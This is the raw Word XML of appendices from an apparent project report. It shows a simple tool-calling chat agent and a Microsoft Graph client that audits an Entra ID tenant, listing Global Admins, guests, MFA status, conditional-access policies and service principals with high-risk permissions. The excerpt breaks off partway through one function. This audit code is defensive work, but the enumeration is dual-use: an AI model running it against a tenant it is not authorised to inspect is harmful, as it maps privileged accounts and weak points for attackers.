          <w:p w14:paraId="22AD4FB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{"role": "system", "content": "You are a helpful assistant."},</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DD741A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{"role": "user", "content": "Hello! Introduce yourself in one sentence."},</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75FF2D7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97F065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max_completion_tokens=200,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7922292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2E9224F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7A2247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print(response.choices[0].message.content)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="521742AA" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="616541FB" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
        <w:spacing w:before="400"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc243301445"/>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Appendix E — agent.py (full source)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="04A12C4E" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stage 0 deliverable: first tool-calling agent, exposing a get_current_time function to the model.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362D51F3" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ cat agent.py</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9500" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="6" w:space="0" w:color="00FF66"/>
          <w:left w:val="single" w:sz="6" w:space="0" w:color="00FF66"/>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="00FF66"/>
          <w:right w:val="single" w:sz="6" w:space="0" w:color="00FF66"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9500"/>
      </w:tblGrid>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="1678DD84" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
            <w:tcMar>
              <w:top w:w="160" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="160" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="03ADB82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import os, json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A7ED16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from datetime import datetime</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E34A52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from zoneinfo import ZoneInfo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34B0943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from dotenv import load_dotenv</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75340ED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from openai import AzureOpenAI</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="692B86F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5E642B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load_dotenv()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D9975A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client = AzureOpenAI(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7342D94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azure_endpoint=os.getenv("AZURE_OPENAI_ENDPOINT"),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6696B50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api_key=os.getenv("AZURE_OPENAI_KEY"),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EAB18B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api_version="2025-04-01-preview",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44E0228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6598C2F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MODEL = os.getenv("AZURE_OPENAI_DEPLOYMENT")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="307D8E7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BCE952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1. The real function</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F3C44D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get_current_time(timezone="Europe/Berlin"):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="662ADAB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datetime.now(ZoneInfo(timezone)).strftime("%Y-%m-%d %H:%M:%S %Z")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="151608D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95E99F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2. The tool definition the model sees</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D46765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tools = [{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6336FC5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"function",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F7B5E6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"function": {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AE2B77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"name": "get_current_time",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76A4523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"description": "Get the current date and time in a given IANA timezone.",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18F25AC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"parameters": {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2492301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"object",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="174B65A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"properties": {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4287913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"timezone": {"type": "string", "description": "e.g. Europe/Berlin, America/New_York"}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65DA7A6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9971E6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"required": [],</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0575625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34A0A5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A7C16B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1580DD5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available = {"get_current_time": get_current_time}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BB79E6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1E43D84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messages = [{"role": "system", "content": "You are a helpful assistant. Use tools when needed."}]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BCD5BB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043296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while True:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B97622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user_input = input("You: ")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="699D4BE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user_input.lower() == "exit":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5276E8E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break</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36D231B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messages.append({"role": "user", "content": user_input})</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38CA627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72F79E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while True:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03640EC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response = client.chat.completions.create(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3098825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model=MODEL, messages=messages, tools=tools,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65CC784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max_completion_tokens=2000,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70300D1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E742E5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msg = response.choices[0].message</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A23600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messages.append(msg)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A26E57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13D338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not msg.tool_calls:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33EDEE0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print(f"AI: {msg.content}\n")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49D22AC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break</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EC128F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lastRenderedPageBreak/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="734E009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for call in msg.tool_calls:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1279B82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args = json.loads(call.function.arguments or "{}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6299E65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result = available[call.function.name](**args)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45275AD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print(f"[tool called: {call.function.name} {args}]")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11D5013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messages.append({</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="339D42C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"role": "tool",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33186A7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"tool_call_id": call.id,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AB8653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"content": result,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F0ED11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tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35D6C93A" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF2795C" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
        <w:spacing w:before="400"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc243301446"/>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Appendix F — graph_client.py (full source)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="7026763E" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stages 1 &amp; 3 deliverable: Microsoft Graph access layer and all audit/enumeration functions, including the fixes applied during Scenario 1 (unified RBAC endpoint for directory-role lookups).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E930EBB" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ cat graph_client.py</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9500" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="6" w:space="0" w:color="00FF66"/>
          <w:left w:val="single" w:sz="6" w:space="0" w:color="00FF66"/>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="00FF66"/>
          <w:right w:val="single" w:sz="6" w:space="0" w:color="00FF66"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9989"/>
      </w:tblGrid>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="7A9111C2" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
            <w:tcMar>
              <w:top w:w="160" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="160" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3AA8C61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import os</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77C550D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import msal</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67BBA0D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import requests</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2417779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from dotenv import load_dotenv</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3353708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231116B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load_dotenv()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61A0D68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253ACE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TENANT_ID = os.getenv("PEARSON_TENANT_ID")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F1DC17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CLIENT_ID = os.getenv("PEARSON_CLIENT_ID")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0392A82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CLIENT_SECRET = os.getenv("PEARSON_CLIENT_SECRET")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C49981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GRAPH = "https://graph.microsoft.com/v1.0"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E5B8AF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GLOBAL_ADMIN_TEMPLATE = "62e90394-69f5-4237-9190-012177145e10"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38EFB1F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E8B81C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28FEDE2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get_token() -&gt; str:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="549E3C3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app = msal.ConfidentialClientApplication(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5579CC7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CLIENT_ID,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CA60F6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authority=f"https://login.microsoftonline.com/{TENANT_ID}",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49A9CD4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client_credential=CLIENT_SECRET,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1234844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3C3FBE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result = app.acquire_token_for_client(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10A296E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scopes=["https://graph.microsoft.com/.default"]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4884875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1F4909D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"access_token" not in result:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="500C6DC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raise RuntimeError(result.get("error_description", result))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07DB525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result["access_token"]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03F39E0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402C0D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68AC144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graph_get(path: str) -&gt; list:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C93A9E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 a Graph path and follow paging."""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37EA249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headers = {"Authorization": f"Bearer {get_token()}"}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C8B742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url, items = f"{GRAPH}{path}", []</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CF2C85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while url:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08FC8DD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 = requests.get(url, headers=headers, timeout=30)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BDA620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r.raise_for_status()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63EF4FC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data = r.json()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ED3753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items += data.get("value", [])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="414440C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url = data.get("@odata.nextLink")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7275F9E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items</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33018E3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DBA299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9DACD5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get_users():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A03642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graph_get(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F253FA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"/users?$select=displayName,userPrincipalName,userType,accountEnabled"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="730882B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288BD9D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1831A11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2FCE25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get_global_admins():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A84034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graph_get(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="357F060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f"/directoryRoles(roleTemplateId='{GLOBAL_ADMIN_TEMPLATE}')/members"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6515F8D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16F8AEA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lastRenderedPageBreak/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D50B58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C51B23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get_ca_policies():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="652FF46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graph_get("/identity/conditionalAccess/policies")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BC0D5D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2FD83D3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15B17C7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get_guests():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5500A30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graph_get("/users?$filter=userType eq 'Guest'&amp;$select=displayName,userPrincipalName")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="147ABCB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3A6F11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67C61D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get_mfa_status():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CC338F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graph_get(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="086C77D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"/reports/authenticationMethods/userRegistrationDetails"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="443EBB2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"?$select=userPrincipalName,isMfaRegistered,isAdmin"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="359F135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2B6160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E78A69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59C061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get_service_principals():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DA15C6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graph_get("/servicePrincipals?$select=displayName,appId,servicePrincipalType")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02634F1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6DDCD2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613C93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check_legacy_auth_blocked():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="701B9D2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"""True if an enabled CA policy blocks legacy clients for all users."""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E69786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for p in get_ca_policies():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F3DC68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cond = p.get("conditions", {})</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FF666F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grant = p.get("grantControls") or {}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AD9BCF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legacy = {"exchangeActiveSync", "other"} &lt;= set(cond.get("clientAppTypes", []))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E34483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blocks = "block" in grant.get("builtInControls", [])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16C468E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all_users = "All" in cond.get("users", {}).get("includeUsers", [])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07F98C3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p.get("state") == "enabled" and legacy and blocks and all_users:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B83C33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{"blocked": True, "policy": p["displayName"]}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58E5BEA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{"blocked": False, "policy": None}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00D0993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D92867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93D082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GRAPH_APP_ID = "00000003-0000-0000-c000-000000000000"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="156F8B3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HIGH_RISK = {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="733C101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"RoleManagement.ReadWrite.Directory", "Directory.ReadWrite.All",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6242707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"Application.ReadWrite.All", "AppRoleAssignment.ReadWrite.All",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29E24A5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"User.ReadWrite.All", "Group.ReadWrite.All", "Mail.ReadWrite",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="694AF12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"Files.ReadWrite.All", "Policy.ReadWrite.ConditionalAccess",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B114CB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61B7E3A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66A4CD0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B5AD6E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get_risky_service_principals():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46F2D60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"""Own-tenant service principals holding high-risk Graph app permissions."""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D088A6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graph_sp = graph_get(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BB35BE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f"/servicePrincipals?$filter=appId eq '{GRAPH_APP_ID}'&amp;$select=id,appRoles"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2ADA755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)[0]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19D3F67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role_names = {r["id"]: r["value"] for r in graph_sp["appRoles"]}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73A278E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B065CE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sps = graph_get(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E26583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"/servicePrincipals?$select=id,displayName,appId,appOwnerOrganizationId,"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20140BF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"passwordCredentials,keyCredentials"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C1B69C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2B5E4D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findings = []</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1718D50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for sp in sps:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EB0A3D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sp.get("appOwnerOrganizationId") != TENANT_ID:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49895D9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continue  # skip Microsoft and third-party apps</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35D873C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lastRenderedPageBreak/>
              <w:t xml:space="preserve">        assigns = graph_get(f"/servicePrincipals/{sp['id']}/appRoleAssignments")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BDF424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perms = [role_names.get(a["appRoleId"], a["appRoleId"])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EFFAB7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for a in assigns if a["resourceId"] == graph_sp["id"]]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4160C04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risky = sorted(set(perms) &amp; HIGH_RISK)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37BC4BE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risky:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DB922B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findings.append({</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="527627C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"name": sp["displayName"],</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19E151A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"appId": sp["appId"],</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7405D19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"risky_permissions": risky,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E45DBC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"secrets": len(sp.get("passwordCredentials", [])),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="790E3AC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"certificates": len(sp.get("keyCredentials", [])),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31F21FC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0B967A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findings</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53CAA6D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206F8E4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2B108A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check_admin_mfa_policy():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CA62C5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"""Is there an enabled CA policy requiring MFA for all users or Global Admins?"""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DFEC8B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for p in get_ca_policies():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1266CB2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p.get("state") != "enabled":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C8D6E1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continue</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28C6368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grant = p.get("grantControls") or {}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5727041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needs_mfa = "mfa" in grant.get("builtInControls", []) or grant.get("authenticationStrength")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ED54D9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users = p.get("conditions", {}).get("users", {})</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="280E3BC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covers_all = "All" in users.get("includeUsers", [])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4518E5D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covers_admins = GLOBAL_ADMIN_TEMPLATE in users.get("includeRoles", [])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67353B3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needs_mfa and (covers_all or covers_admins):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="002CD6D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{"covered": True, "policy": p["displayName"]}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5339C7B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{"covered": False, "policy": None}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AB0D09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1C3F0FC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A4D978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get_security_defaults():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DBB7D3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 = requests.get(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CBECED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f"{GRAPH}/policies/identitySecurityDefaultsEnforcementPolicy",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F12DD1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headers={"Authorization": f"Bearer {get_token()}"}, timeout=30,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01B9597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EA8BE2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r.raise_for_status()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A92EAC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{"security_defaults_enabled": r.json().get("isEnabled")}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2145CFA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E3B063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96A44B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get_user_owned_objects(upn: str):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CDA3CE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graph_get(f"/users/{upn}/ownedObjects")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B5F346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E69F5A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2022EB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get_sp_role_assignments(sp_id: str):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28C5C4B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"""What app roles a service principal has been granted on other resources, and who/what holds roles on it."""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4617A15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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1394FAF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"granted_to_this_sp": graph_get(f"/servicePrincipals/{sp_id}/appRoleAssignments"),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="556DB63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"assigned_on_this_sp": graph_get(f"/servicePrincipals/{sp_id}/appRoleAssignedTo"),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CF3606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"oauth2_grants": graph_get(f"/oauth2PermissionGrants?$filter=clientId eq '{sp_id}'"),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FC6FB4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1FA2D04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41DD6F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7CC960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get_user_owned_devices(upn: str):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EA44B4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graph_get(f"/users/{upn}/ownedDevices?$select=displayName,deviceId,operatingSystem,trustType,accountEnabled")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FE8E09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3FD267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11B8CD9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get_user_owned_groups(upn: str):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79B3DC1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lastRenderedPageBreak/>
              <w:t xml:space="preserve">    return graph_get(f"/users/{upn}/ownedObjects/microsoft.graph.group?$select=displayName,id")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="040F4E1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A33022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1E63E1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get_sp_directory_roles(sp_id: str):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28E849A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"""Which directory roles (e.g. Privileged Authentication Administrator) this service principal is a member of."""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="725F458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assignments = graph_get(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BFBBB3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f"/roleManagement/directory/roleAssignments?$filter=principalId eq '{sp_id}'&amp;$expand=roleDefinition"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1349FF0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18C9856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[a["roleDefinition"]["displayName"] for a in assignments]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="060FED2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2C08D89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6A6ADFC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get_role_members(role_name: str):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21174F2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"""List users and service principals holding a given directory role, by role display name."""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="164442B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roles = graph_get(f"/roleManagement/directory/roleDefinitions?$filter=displayName eq '{role_name}'")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53BF4AA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not roles:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C9EE38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{"error": f"No role found named '{role_name}'"}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="268B47C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role_id = roles[0]["id"]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="484D447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assignments = graph_get(</w:t>
            </w:r>
          </w:p>
